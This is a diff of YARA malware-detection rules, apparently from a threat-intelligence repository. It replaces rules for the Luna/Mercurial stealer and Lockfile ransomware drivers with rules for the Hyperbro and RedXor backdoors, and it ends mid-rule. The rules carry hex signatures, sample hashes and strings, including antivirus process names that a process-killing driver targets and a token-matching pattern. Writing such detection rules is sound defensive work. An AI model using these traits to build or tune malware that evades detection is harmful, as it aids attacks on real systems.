-		logic_hash = "8e4b9ef8a908a13e738da31b28c879228c3bdc1d8461417b1c1bf31026c98abf"
+		logic_hash = "46dd4d8ba58e79761056d3dd6921530520b0071090bcfc3bfaed7a6804f787b7"
 		score = 75
-		quality = 75
+		quality = 63
 		tags = "FILE"
-		hash1 = "0958e1f4c3d14e4de380bda4c5648ab4fa4459ef8f5daaf32bb5f3420217af32"
-		hash2 = "5d753e72ef89f1cef3b7007df812c7a504727816a7b91ecd75cc9acdfb7e9c2e"
-		hash3 = "a18bec90b2b6185362eeb67c516c82dd34cd8f6a7423875921572e97ae1668b0"
-		hash4 = "af2a2be20d7bbec0a9bb4a4dfa898aa18ef4994a9791d7cf37b7b62b379992ac"
-		hash5 = "d38e8f113c36cfa9e05c4d0d6b526d81b69039430c3b1fc64a08a3445b5a5abe"
-		tlp = "White"
-		adversary = "Oceanlotus"
+		hash1 = "172ac73cda6260918510ad2f4481a7fcd90c5a86d47dd880c5bcb3596dd20a7d"
 
 	strings:
-		$seq1 = { 41 57 41 56 41 55 41 54 41 89 f5 55 53 49 89 fc 48 83 ec 58 64 48 8b 04 25 28 00 00 00 48 89 44 24 48 31 c0 e8 77 60 ff ff 89 c7 e8 20 60 ff ff 48 8b 58 20 c6 44 24 10 85 48 8d 7c 24 10 c6 44 24 11 2d c6 44 24 12 c5 ba 22 00 00 00 c6 44 24 13 7a c6 44 24 14 02 be 30 00 00 00 c6 44 24 15 58 c6 44 24 16 30 c6 44 24 17 e4 c6 44 24 18 8a c6 44 24 19 37 c6 44 24 1a bd c6 44 24 1b 68 c6 44 24 1c f6 c6 44 24 1d f8 c6 44 24 1e 6c c6 44 24 1f 8c c6 44 24 20 97 c6 44 24 21 cb c6 44 24 22 73 c6 44 24 23 bd c6 44 24 24 7b c6 44 24 25 19 c6 44 24 26 93 c6 44 24 27 a0 c6 44 24 28 26 c6 44 24 29 26 c6 44 24 2a ae c6 44 24 2b 1c c6 44 24 2c 96 c6 44 24 2d 1d c6 44 24 2e 0f c6 44 24 2f be 44 8b 05 b6 7c 21 00 48 8b 0d b7 7c 21 00 c6 44 24 30 b2 c6 44 24 31 7d c6 44 24 32 48 c6 44 24 33 b9 c6 44 24 34 b6 c6 44 24 35 a4 c6 44 24 36 30 c6 44 24 37 43 c6 44 24 38 06 c6 44 24 39 e3 c6 44 24 3a 4f c6 44 24 3b 06 c6 44 24 3c f5 c6 44 24 3d 87 c6 44 24 3e d5 c6 44 24 3f 6a e8 3a 71 ff ff 48 89 df 48 89 c6 48 89 c5 e8 bc 6c ff ff 45 85 ed 48 89 c3 0f 85 a0 00 00 00 48 89 df e8 58 6e ff ff 85 c0 0f 84 30 01 00 00 8b 05 2a 7c 21 00 48 c7 44 24 08 00 00 00 00 48 83 ec 08 c7 44 24 0c 00 00 00 00 4c 8b 0d 16 7c 21 00 ba 2a 00 00 00 4c 89 e6 bf 01 00 00 00 50 4c 8d 44 24 14 48 8d 4c 24 18 e8 b1 71 ff ff 85 c0 5a }
-		$seq2 = { 41 54 41 b8 08 00 00 00 55 53 b9 00 f3 61 00 ba 42 00 00 00 49 89 fd 49 89 f4 48 83 ec 68 be 50 00 00 00 48 89 e7 c6 04 24 bf c6 44 24 01 cf 64 48 8b 04 25 28 00 00 00 48 89 44 24 58 31 c0 c6 44 24 02 c6 c6 44 24 03 a1 c6 44 24 04 20 c6 44 24 05 76 c6 44 24 06 5d c6 44 24 07 e5 c6 44 24 08 ec c6 44 24 09 87 c6 44 24 0a 45 c6 44 24 0b 26 c6 44 24 0c e1 c6 44 24 0d c8 c6 44 24 0e 8e c6 44 24 0f c0 c6 44 24 10 89 c6 44 24 11 d2 c6 44 24 12 ac c6 44 24 13 c1 c6 44 24 14 01 c6 44 24 15 08 c6 44 24 16 ac c6 44 24 17 8e c6 44 24 18 52 c6 44 24 19 65 c6 44 24 1a c9 c6 44 24 1b 06 c6 44 24 1c be c6 44 24 1d 82 c6 44 24 1e ef c6 44 24 1f 85 c6 44 24 20 9f c6 44 24 21 96 c6 44 24 22 fa c6 44 24 23 65 c6 44 24 24 50 c6 44 24 25 dd c6 44 24 26 0e c6 44 24 27 e0 c6 44 24 28 87 c6 44 24 29 ba c6 44 24 2a 27 c6 44 24 2b f8 c6 44 24 2c ef c6 44 24 2d 5c c6 44 24 2e 60 c6 44 24 2f 07 c6 44 24 30 b1 c6 44 24 31 c5 c6 44 24 32 3d c6 44 24 33 81 c6 44 24 34 df c6 44 24 35 87 c6 44 24 36 64 c6 44 24 37 01 c6 44 24 38 04 c6 44 24 39 9b c6 44 24 3a f9 c6 44 24 3b da c6 44 24 3c 28 c6 44 24 3d f1 c6 44 24 3e 30 c6 44 24 3f cb c6 44 24 40 c8 c6 44 24 41 48 c6 44 24 42 43 c6 44 24 43 e6 c6 44 24 44 e5 c6 44 24 45 f3 c6 44 24 46 c9 c6 44 24 47 8b c6 44 24 48 3c c6 44 24 49 a7 c6 44 24 4a 8b c6 44 24 4b 48 c6 44 24 4c 54 c6 44 24 4d 13 c6 44 24 4e 2b c6 44 24 4f bb e8 a4 aa ff ff bf 00 04 00 00 48 89 c5 e8 77 9a ff ff be 00 04 00 00 48 89 c3 48 89 c7 e8 37 9b ff ff 4c 89 ea 48 }
-		$seq3 = { 48 8d 7c 24 10 c6 44 24 10 fb c6 44 24 11 d0 64 48 8b 04 25 28 00 00 00 48 89 84 24 08 01 00 00 31 c0 c6 44 24 12 8d c6 44 24 13 ac c6 44 24 14 db c6 44 24 15 79 c6 44 24 16 84 c6 44 24 17 52 c6 44 24 18 44 c6 44 24 19 46 c6 44 24 1a 6c c6 44 24 1b d1 c6 44 24 1c ac c6 44 24 1d 31 c6 44 24 1e ca c6 44 24 1f 18 c6 44 24 20 18 c6 44 24 21 90 c6 44 24 22 ec c6 44 24 23 8f c6 44 24 24 a1 c6 44 24 25 74 c6 44 24 26 a8 c6 44 24 27 9a c6 44 24 28 53 c6 44 24 29 d4 c6 44 24 2a a4 c6 44 24 2b 5b c6 44 24 2c 68 c6 44 24 2d c8 c6 44 24 2e dd c6 44 24 2f a5 e8 18 a9 ff ff 48 89 c7 49 89 c5 e8 4d a6 ff ff 83 f8 01 74 40 31 db 4d 85 ed 74 08 4c 89 ef e8 b9 95 ff ff 48 8b 8c 24 08 01 00 00 64 48 33 }
-		$seq4 = { ba 15 00 00 00 be 20 00 00 00 c6 44 24 30 b1 c6 44 24 31 be c6 44 24 32 54 c6 44 24 33 93 c6 44 24 34 29 c6 44 24 35 67 c6 44 24 36 1f c6 44 24 37 b5 c6 44 24 38 a5 c6 44 24 39 ec c6 44 24 3a 18 c6 44 24 3b 53 c6 44 24 3c f0 c6 44 24 3d f1 c6 44 24 3e fe c6 44 24 3f 9f c6 44 24 40 27 c6 44 24 41 8f c6 44 24 42 8d c6 44 24 43 77 c6 44 24 44 1e c6 44 24 45 e1 c6 44 24 46 e1 c6 44 24 47 f0 c6 44 24 48 9e c6 44 24 49 e2 c6 44 24 4a 0d c6 44 24 4b 96 c6 44 24 4c ff c6 44 24 4d 6c c6 44 24 4e b4 c6 44 24 4f 16 e8 09 a8 ff ff 4c 89 ef 48 89 c6 49 89 c4 e8 8b a3 ff ff 48 8d bc 24 90 00 00 00 41 b8 08 00 00 00 b9 00 f3 61 00 ba 69 00 00 00 be 70 00 00 00 48 89 04 24 c6 84 24 90 00 00 00 b3 c6 84 24 91 00 00 00 0b c6 84 24 92 00 00 00 18 c6 84 24 93 00 00 00 fd c6 84 24 94 00 00 00 71 c6 84 24 95 00 00 00 3b c6 84 24 96 00 00 00 b7 c6 84 24 97 00 00 00 fc c6 84 24 98 00 00 00 70 c6 84 24 99 00 00 00 18 c6 84 24 9a 00 00 00 f7 c6 84 24 9b 00 00 00 22 c6 84 24 9c 00 00 00 2d c6 84 24 9d 00 00 00 75 c6 84 24 9e 00 00 00 5d c6 84 24 9f 00 00 00 8f c6 84 24 a0 00 00 00 75 c6 84 24 a1 00 00 00 60 c6 84 24 a2 00 00 00 91 c6 84 24 a3 00 00 00 b3 c6 84 24 a4 00 00 00 1a c6 84 24 a5 00 00 00 0b c6 84 24 a6 00 00 00 00 c6 84 24 a7 00 00 00 5c c6 84 24 a8 00 00 00 6b c6 84 24 a9 00 00 00 8d c6 84 24 aa 00 00 00 ee c6 84 24 ab 00 00 00 3b c6 84 24 ac 00 00 00 7e c6 84 24 ad 00 00 00 67 c6 84 24 ae 00 00 00 72 c6 84 24 af 00 00 00 43 c6 84 24 b0 00 00 00 f6 c6 84 24 b1 00 00 00 14 c6 84 24 b2 00 00 00 32 c6 84 24 b3 00 00 00 c1 c6 84 24 b4 00 00 00 79 c6 84 24 b5 00 00 00 0d c6 84 24 b6 00 00 00 0d c6 84 24 b7 00 00 00 22 c6 84 24 b8 00 00 00 e1 c6 84 24 b9 00 00 00 bd c6 84 24 ba 00 00 00 3f c6 84 24 bb 00 00 00 82 c6 84 24 bc 00 00 00 dd c6 84 24 bd 00 00 00 23 c6 84 24 be 00 00 00 7d c6 84 24 bf 00 00 00 87 c6 84 24 c0 00 00 00 34 c6 84 24 c1 00 00 00 9d c6 84 24 c2 00 00 00 43 c6 84 24 c3 00 00 00 98 c6 84 24 c4 00 00 00 da c6 84 24 c5 00 00 00 e0 c6 84 24 c6 00 00 00 3d c6 84 24 c7 00 00 00 64 c6 84 24 c8 00 00 00 1a c6 84 24 c9 00 00 00 d7 c6 84 24 ca 00 00 00 f5 c6 84 24 cb 00 00 00 5a c6 84 24 cc 00 00 00 c3 c6 84 24 cd 00 00 00 9c c6 84 24 ce 00 00 00 97 c6 84 24 cf 00 00 00 c7 c6 84 24 d0 00 00 00 65 c6 84 24 d1 00 00 00 8f c6 84 24 d2 00 00 00 99 c6 84 24 d3 00 00 00 eb c6 84 24 d4 00 00 00 2f c6 84 24 d5 00 00 00 2b c6 84 24 d6 00 00 00 d0 c6 84 24 d7 00 00 00 d9 c6 84 24 d8 00 00 00 4e c6 84 24 d9 00 00 00 8f c6 84 24 da 00 00 00 7b c6 84 24 db 00 00 00 97 c6 84 24 dc 00 00 00 3b c6 84 24 dd 00 00 00 14 c6 84 24 de 00 00 00 e9 c6 84 24 df 00 00 00 e9 c6 84 24 e0 00 00 00 82 c6 84 24 e1 00 00 00 48 c6 84 24 e2 00 00 00 dc c6 84 24 e3 00 00 00 a3 c6 84 24 e4 00 00 00 75 c6 84 24 e5 00 00 00 ca c6 84 24 e6 00 00 00 e6 c6 84 24 e7 00 00 00 40 c6 84 24 e8 00 00 00 6b c6 84 24 e9 00 00 00 b1 c6 84 24 ea 00 00 00 68 c6 84 24 eb 00 00 00 42 c6 84 24 ec 00 00 00 56 c6 84 24 ed 00 00 00 b4 c6 84 24 ee 00 00 00 ac c6 84 24 ef 00 00 00 2a c6 84 24 f0 00 00 00 fc c6 84 24 f1 00 00 00 34 c6 84 24 f2 00 00 00 fa c6 84 24 f3 00 00 00 1d c6 84 24 f4 00 00 00 1b c6 84 24 f5 00 00 00 9a c6 84 24 f6 00 00 00 62 c6 84 24 f7 00 00 00 b3 c6 84 24 f8 00 00 00 39 c6 84 24 f9 00 00 00 6a c6 84 24 fa 00 00 00 19 c6 84 24 fb 00 00 00 1b c6 84 24 fc 00 00 00 f3 c6 84 24 fd 00 00 00 c5 c6 84 24 fe 00 00 00 d2 c6 84 24 ff 00 00 00 6a e8 55 a4 ff ff 48 89 c7 48 89 c5 e8 4a 92 ff ff 44 8d 7c 03 0a 4d 63 ff 4c 89 ff e8 1a 94 ff ff 4c 89 fe 48 89 c3 48 89 c7 e8 dc 94 ff ff 4c 89 f2 48 89 ee 48 89 df 31 c0 e8 2c 95 ff ff 48 89 da 8b 0a 48 83 c2 04 8d 81 ff fe fe fe f7 d1 21 c8 25 80 80 80 80 74 e9 89 c1 4c 8b 3c 24 48 89 de c1 e9 10 a9 80 80 00 00 0f 44 c1 48 8d 4a 02 4c 89 ff 48 0f 44 d1 89 c1 00 c1 48 83 da 03 48 29 da e8 93 a8 ff ff 4c 89 ff be ed 01 00 00 4c 89 3c 24 e8 d2 aa ff ff 48 8d 44 24 50 41 b8 08 00 00 00 b9 00 f3 61 00 ba 34 00 00 00 be 40 00 00 00 c6 44 24 50 c6 48 89 c7 c6 44 24 51 3b c6 44 24 52 16 c6 44 24 53 01 c6 44 24 54 92 c6 44 24 55 36 c6 44 24 56 81 c6 44 24 57 c8 c6 44 24 58 f3 c6 44 24 59 49 c6 44 24 5a a8 c6 44 24 5b 02 c6 44 24 5c 6f c6 44 24 5d 9d c6 44 24 5e db c6 44 24 5f 61 c6 44 24 60 8a c6 44 24 61 e3 c6 44 24 62 f4 c6 44 24 63 1b c6 44 24 64 33 c6 44 24 65 4d c6 44 24 66 b4 c6 44 24 67 00 c6 44 24 68 f4 c6 44 24 69 76 c6 44 24 6a 70 c6 44 24 6b 56 c6 44 24 6c e2 c6 44 24 6d f3 c6 44 24 6e 5c c6 44 24 6f 73 c6 44 24 70 06 c6 44 24 71 de c6 44 24 72 c5 c6 44 24 73 fa c6 44 24 74 4c c6 44 24 75 7b c6 44 24 76 34 c6 44 24 77 b9 c6 44 24 78 d3 c6 44 24 79 a6 c6 44 24 7a 9b c6 44 24 7b 03 c6 44 24 7c f7 c6 44 24 7d 8e c6 44 24 7e 37 c6 44 24 7f 6a c6 84 24 80 00 00 00 3a c6 84 24 81 00 00 00 97 c6 84 24 82 00 00 00 57 c6 84 24 83 00 00 00 25 c6 84 24 84 00 00 00 2c c6 84 24 85 00 00 00 ac c6 84 24 86 00 00 00 a6 c6 84 24 87 00 00 00 de c6 84 24 88 00 00 00 29 c6 84 24 89 00 00 00 ca c6 84 24 8a 00 00 00 c0 c6 84 24 8b 00 00 00 93 c6 84 24 8c 00 00 00 67 c6 84 24 8d 00 00 00 47 c6 84 24 8e 00 00 00 8d c6 84 24 8f 00 00 00 }
+		$s1 = { 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 22 53 68 6f 63 6b 77 61 76 65 46 6c 61 73 68 2e 53 68 6f 63 6b 77 61 76 65 46 6c 61 73 68 22 29 }
+		$s2 = "$version" fullword ascii
+		$s3 = { 6e 61 76 69 67 61 74 6f 72 2e 70 6c 75 67 69 6e 73 26 26 6e 61 76 69 67 61 74 6f 72 2e 70 6c 75 67 69 6e 73 2e 6c 65 6e 67 74 68 3e 30 }
+		$s4 = { 6e 61 76 69 67 61 74 6f 72 2e 70 6c 75 67 69 6e 73 5b 22 53 68 6f 63 6b 77 61 76 65 20 46 6c 61 73 68 22 5d }
+		$s5 = { 63 6c 61 73 73 69 64 3d 27 63 6c 73 69 64 3a 44 32 37 43 44 42 36 45 2d 41 45 36 44 2d 31 31 63 66 2d 39 36 42 38 2d 34 34 34 35 35 33 35 34 30 30 30 30 27 }
+		$s6 = { 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 73 68 6f 63 6b 77 61 76 65 2d 66 6c 61 73 68 22 }
+		$s7 = { 22 64 61 74 61 22 2c 22 2f 6c 6f 67 6f 2e 73 77 66 22 }
+		$s8 = { 22 30 30 30 30 30 30 30 30 22 2b 28 [1-8] 5b 30 5d 3e 3e 3e 30 29 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 29 2e 73 6c 69 63 65 28 2d 38 29 2b 28 22 30 30 30 30 30 30 30 30 22 2b 28 [1-8] 5b 31 5d 3e 3e 3e 30 29 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 29 2e 73 6c 69 63 65 28 2d 38 29 }
 
 	condition:
-		uint32( 0 ) == 0x464c457f and filesize > 10KB and 3 of ( $seq* )
+		filesize > 5KB and 6 of ( $s* )
 }
-rule ARKBIRD_SOLG_MAL_Luna_Stealer_Apr_2021_1 : FILE
+rule ARKBIRD_SOLG_APT_APT27_Hyperbro_Apr_2021_1 : FILE
 {
 	meta:
-		description = "Detect Luna stealer (also Mercurial Grabber)"
+		description = "Detect Hyperbro backdoor"
 		author = "Arkbird_SOLG"
-		id = "2fecce99-5869-5de0-afae-6dc245748fa6"
-		date = "2021-08-29"
-		modified = "2021-08-30"
-		reference = "https://github.com/NightfallGT/Mercurial-Grabber"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-29/Luna/MAL_Luna_Stealer_Apr_2021_1.yara#L1-L22"
+		id = "060a200e-17dd-5789-94d4-eeff5c2e9a18"
+		date = "2021-05-01"
+		modified = "2021-05-04"
+		reference = "-"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-03/APT27/APT_APT27_Hyperbro_Apr_2021_1.yara#L1-L21"
 		license_url = "N/A"
-		logic_hash = "934ded815c262fa8bee38638e17ed8c2b1f0dcad28037bf1d525e11bf7e34dce"
+		logic_hash = "1a32ab7c30885a665ede66640a9b047e3c381f6f535243fcadf1a7a22e76f407"
 		score = 75
-		quality = 75
+		quality = 35
 		tags = "FILE"
-		hash1 = "a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18"
-		hash2 = "93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f"
-		hash3 = "0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21"
-		hash4 = "ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a"
+		hash1 = "36fad80a5f328f487b20a3f5fc5f1902d50cbb1bd9167c44b66929a1288fc6f4"
+		hash2 = "52072a8f99dacd5c293fccd051eab95516d8b880cd2bc5a7e0f4a30d008e22a7"
+		hash3 = "9000ce3c0e01b6c80edb3af87aad8117513ce334135aa7d7b1c2afa067f4c4ab"
+		hash4 = "92bbcb5461ab5959e31f997a6df77995377d69f8077e43e5812fcbe9303d831c"
 		tlp = "White"
-		adversary = "-"
+		adversary = "APT27"
 
 	strings:
-		$s1 = { 73 ?? 00 00 0a 0b 07 72 [2] 00 70 02 7b ?? 00 00 04 28 ?? 00 00 0a 6f ?? 00 00 0a 0c 08 6f ?? 00 00 0a 6f ?? 00 00 0a 6f ?? 00 00 0a 0d 09 6f ?? 00 00 0a 0a 02 72 [2] 00 70 06 28 ?? 00 00 06 7d ?? 00 00 04 02 72 [2] 00 70 06 28 ?? 00 00 06 7d ?? 00 00 04 02 72 [2] 00 70 06 28 ?? 00 00 06 7d ?? 00 00 04 02 72 [2] 00 70 06 28 ?? 00 00 06 7d ?? 00 00 04 02 72 [2] 00 70 06 28 ?? 00 00 06 7d ?? 00 00 04 02 72 [2] 00 70 06 28 ?? 00 00 06 7d ?? 00 00 04 02 72 [2] 00 70 06 28 ?? 00 00 06 7d ?? 00 00 04 06 28 ?? 00 00 0a de 0a 07 2c 06 07 6f ?? 00 00 0a dc de 1a 13 04 72 [2] 00 70 11 04 6f ?? 00 00 0a 28 ?? 00 00 0a 28 ?? 00 00 0a de 00 2a }
-		$s2 = { 72 [2] 00 70 02 7b ?? 00 00 04 28 ?? 00 00 06 0a 02 72 [2] 00 70 02 7b ?? 00 00 04 28 ?? 00 00 06 7d ?? 00 00 04 72 [2] 00 70 02 7b ?? 00 00 04 28 ?? 00 00 06 0b 02 06 72 [2] 00 70 07 28 ?? 00 00 0a 7d ?? 00 00 04 72 [2] 00 70 02 7b ?? 00 00 04 28 ?? 00 00 06 0c 02 72 [2] 00 70 02 7b ?? 00 00 04 72 [2] 00 70 08 28 ?? 00 00 0a 7d ?? 00 00 04 02 72 [2] 00 70 02 7b ?? 00 00 04 28 ?? 00 00 06 7d ?? 00 00 04 02 72 [2] 00 70 02 7b ?? 00 00 04 28 ?? 00 00 06 7d ?? 00 00 04 02 72 [2] 00 70 02 7b ?? 00 00 04 28 ?? 00 00 06 7d ?? 00 00 04 02 7b ?? 00 00 04 28 ?? 00 00 0a 1f 16 63 21 00 b0 ca a2 4a 01 00 00 58 0d 09 28 ?? 00 00 0a 13 05 12 05 28 ?? 00 00 0a 13 04 02 12 04 fe 16 ?? 00 00 01 6f ?? 00 00 0a 7d ?? 00 00 04 2a }
-		$s3 = { 72 [2] 00 70 73 ?? 00 00 0a 0a 06 6f ?? 00 00 0a 6f ?? 00 00 0a 0c 2b 75 08 6f ?? 00 00 0a 74 ?? 00 00 01 0b 07 72 [2] 00 70 6f ?? 00 00 0a 2c 16 02 07 72 [2] 00 70 6f ?? 00 00 0a 6f ?? 00 00 0a 7d ?? 00 00 04 07 72 [2] 00 70 6f ?? 00 00 0a 2c 16 02 07 72 [2] 00 70 6f ?? 00 00 0a 6f ?? 00 00 0a 7d ?? 00 00 04 07 72 ?? 19 00 70 6f ?? 00 00 0a 2c 16 02 07 72 ?? 19 00 70 6f ?? 00 00 0a 6f ?? 00 00 0a 7d ?? 00 00 04 08 6f ?? 00 00 0a 2d 83 de 0a 08 2c 06 08 6f ?? 00 00 0a dc 2a }
-		$x1 = "---------------- mercurial grabber ----------------" fullword wide
-		$x2 = { 5c 00 73 00 2a 00 3a 00 5c 00 73 00 2a 00 28 00 22 00 28 00 3f 00 3a 00 5c 00 5c 00 22 00 7c 00 5b 00 5e 00 22 00 5d 00 29 00 2a 00 3f }
-		$x3 = { 5b 00 5c 00 77 00 2d 00 5d 00 7b 00 32 00 34 00 7d 00 5c 00 2e 00 5b 00 5c 00 77 00 2d 00 5d 00 7b 00 36 00 7d 00 5c 00 2e 00 5b 00 5c 00 77 00 2d 00 5d 00 7b 00 32 00 37 00 7d 00 01 1d 6d 00 66 00 61 00 5c 00 2e 00 5b 00 5c 00 77 00 2d 00 5d 00 7b 00 38 00 34 00 7d }
+		$seq1 = { 8b [5] 7? 0? [2] 0? ?? 0? [3] ff 75 0? [11] 5? [2] 0? ?? 8b }
+		$seq2 = { e8 ?? 0? 00 00 b0 01 c3 55 8b ec ff 75 08 ff 15 34 c0 00 10 85 c0 74 11 56 8b 30 50 e8 ?? 1? 00 00 8b c6 59 85 f6 75 f1 5e 5d c3 cc 8b 4c 24 0c 0f b6 44 24 08 8b d7 8b 7c 24 04 85 c9 0f 84 3c 01 00 00 69 c0 01 01 01 01 83 f9 20 0f 8e df 00 00 00 81 f9 80 00 00 00 0f 8c 8b 00 00 00 0f ba 25 b8 27 01 10 01 73 09 f3 aa 8b 44 24 04 8b fa c3 0f ba 25 10 20 01 10 01 0f 83 b2 00 00 00 66 0f 6e c0 66 }
+		$seq3 = { 8b 44 24 08 48 75 [13] be ?? 16 00 10 bb 00 10 00 10 05 [2] 00 00 2b f3 [0-3] 74 0? 8? [0-2] cf [0-4] 03 cb ?? 11 47 3b fe 72 ?? e8 ?? fd ff ff 5f 5e 5b 33 c0 40 c2 0c 00 8b ff 55 8b ec 8b 45 0c 56 57 83 f8 01 75 7c 50 e8 1c 14 00 00 59 85 c0 75 07 33 c0 e9 0e 01 00 00 e8 a6 06 00 00 85 c0 75 07 e8 32 14 00 00 eb e9 e8 af 13 00 00 ff 15 ?? 80 00 10 a3 18 b8 00 10 e8 68 12 00 00 a3 64 ac 00 10 e8 89 0c 00 00 85 c0 7d 07 e8 1f 03 00 00 eb cf e8 93 11 00 00 85 c0 7c 20 e8 12 0f 00 00 85 c0 7c 17 6a 00 e8 41 0a 00 00 59 85 c0 75 0b ff 05 60 ac 00 10 e9 a8 00 00 00 e8 a4 0e 00 00 eb c9 33 ff 3b c7 75 31 39 3d 60 ac 00 10 7e 81 ff 0d 60 ac 00 10 39 3d b4 ac 00 10 75 05 e8 d0 0b 00 00 39 7d 10 75 7b e8 77 0e 00 00 e8 bd 02 00 00 e8 a1 13 00 00 eb 6a 83 f8 02 75 59 e8 78 02 00 00 68 14 02 00 00 6a 01 e8 54 08 00 00 8b f0 59 59 3b f7 0f 84 36 ff ff ff 56 ff 35 00 a0 00 10 ff 35 7c ac 00 10 e8 d3 01 00 00 59 ff d0 85 c0 74 17 57 56 e8 b1 02 00 00 59 59 ff 15 ?? 80 00 10 83 4e 04 ff 89 06 eb 18 56 e8 3f 07 00 00 59 e9 fa fe ff ff 83 f8 03 75 07 57 e8 33 05 00 00 59 33 c0 40 5f 5e 5d c2 0c 00 6a 0c 68 d0 92 00 10 e8 ?? 15 00 00 8b f9 8b f2 8b 5d 08 33 c0 40 89 45 e4 85 f6 75 0c 39 15 60 ac 00 10 0f 84 c5 00 00 00 83 65 fc 00 3b f0 74 05 83 fe 02 75 2e a1 ?? 81 00 10 85 c0 74 08 57 56 53 ff d0 89 45 e4 83 7d e4 00 0f 84 96 00 00 00 57 56 53 e8 72 fe ff ff 89 45 e4 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 20KB and 2 of ( $x* ) and 2 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 10KB and 2 of ( $seq* )
 }
-rule ARKBIRD_SOLG_MAL_Killproc_Aug_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_Redxor_Feb_2021_1 : FILE
 {
 	meta:
-		description = "Detect KillProc driver used by Night Dragon for kill process before encryption"
+		description = "Detect RedXor backdoor (Feb 2021)"
 		author = "Arkbird_SOLG"
-		id = "b0d6a21d-f451-58c9-b640-ad57feec7c38"
-		date = "2021-08-27"
-		modified = "2021-08-29"
-		reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-29/Lockfile/MAL_KillProc_Aug_2021_1.yara#L1-L21"
+		id = "10ae10b7-b351-5dda-9408-aa01a40e3d6a"
+		date = "2021-03-14"
+		modified = "2021-05-24"
+		reference = "https://www.intezer.com/blog/malware-analysis/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-23/RedXor/MAL_RedXor_Feb_2021_1.yara#L1-L20"
 		license_url = "N/A"
-		logic_hash = "d24634e7719e3b6be3322b07c3e754e8c1275c73102c6d7f8d9abaae9887a0da"
+		logic_hash = "b4e3ea24bb19abe7065ed5fc94f65e68ea84b11da7b45936ee991ef6aac6d33d"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "36e8bb8719a619b78862907fd49445750371f40945fefd55a9862465dc2930f9"
-		adversary = "Lockfile"
-
-	strings:
-		$s1 = "find %s!\n" fullword ascii
-		$s2 = "killed %s!\n" fullword ascii
-		$s3 = "DbgPrint" fullword ascii
-		$s4 = "ntoskrnl.exe" fullword ascii
-		$s5 = "SBPIMSvc.exe" fullword ascii
-		$s6 = "MsMpEng.exe" fullword ascii
-		$s7 = { 48 8b ce ff 15 92 cf ff ff 48 8b d0 48 8b cb ff 15 8e cf ff ff 48 8d 7f 08 85 c0 74 0d 48 8b 1f 44 38 23 75 db e9 a7 00 00 00 48 8b ce ff 15 68 cf ff ff 48 8b d0 48 8d 0d 6e bf ff ff ff 15 70 cf ff ff 48 8b ce ff 15 37 cf ff ff 8b c8 48 8d 54 24 40 ff 15 3a cf ff ff 85 c0 78 56 48 8b 4c 24 40 48 8d 84 24 a8 00 00 00 48 89 44 24 30 45 33 c9 44 88 64 24 28 45 33 c0 33 d2 4c 89 64 24 20 ff 15 04 cf ff ff 85 c0 74 05 45 32 f6 eb 41 48 8b 8c 24 a8 00 00 00 33 d2 ff 15 0b cf ff ff 48 8b 8c 24 a8 00 00 00 ff 15 0d cf ff ff 41 b6 01 eb 05 45 84 f6 74 19 48 8b ce ff 15 da ce ff ff 48 8b d0 48 8d 0d f0 be ff ff ff 15 e2 ce ff ff 48 8b ce ff 15 a1 ce ff ff 48 83 }
-		$s8 = "UpdaterUI.exe" fullword ascii
-		$s9 = "VipreNis.exe" fullword ascii
-
-	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 3KB and 6 of ( $s* )
-}
-rule ARKBIRD_SOLG_MAL_Kernel_Driver_Aug_2021_1 : FILE
-{
-	meta:
-		description = "Detect kernel driver used by lockfile group"
-		author = "Arkbird_SOLG"
-		id = "80bf5286-6da6-5380-ad14-345d8122d3d4"
-		date = "2021-08-28"
-		modified = "2021-08-29"
-		reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-29/Lockfile/MAL_Kernel_Driver_Aug_2021_1.yara#L1-L21"
-		license_url = "N/A"
-		logic_hash = "225bd5995d3f1ed4c0bcb43c862662c9e5badd96a87d779d3bc6f1809d0ce3bb"
-		score = 75
-		quality = 50
-		tags = "FILE"
-		hash1 = "5a08ecb2fad5d5c701b4ec42bd0fab7b7b4616673b2d8fbd76557203c5340a0f"
-		hash2 = "0d18c704049700efd1353055b604072d94bcc3e5f4aa558adf8b8f8848330644"
-		hash3 = "2b7ffe47b3fabf81a76386ee953d281aeaa158f4926896fcc1425c3844e73597"
-		hash4 = "61423a95146d5fca47859e43d037944edb32f2004d86e14c7a522270bde6e2a8f"
-		adversary = "Lockfile"
+		hash1 = "0423258b94e8a9af58ad63ea493818618de2d8c60cf75ec7980edcaa34dcc919"
+		hash2 = "0a76c55fa88d4c134012a5136c09fb938b4be88a382f88bf2804043253b0559"
+		tlp = "White"
+		adversary = "Winnti"
 
 	strings:
-		$s1 = "\\BaseNamedObjects\\{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}" fullword wide
-		$s2 = "\\REGISTRY\\MACHINE\\SYSTEM\\CurrentControlSet\\Services\\%ws" fullword wide
-		$s3 = "\\DosDevices\\%wS" fullword wide
-		$s4 = "%temp%\\" fullword wide
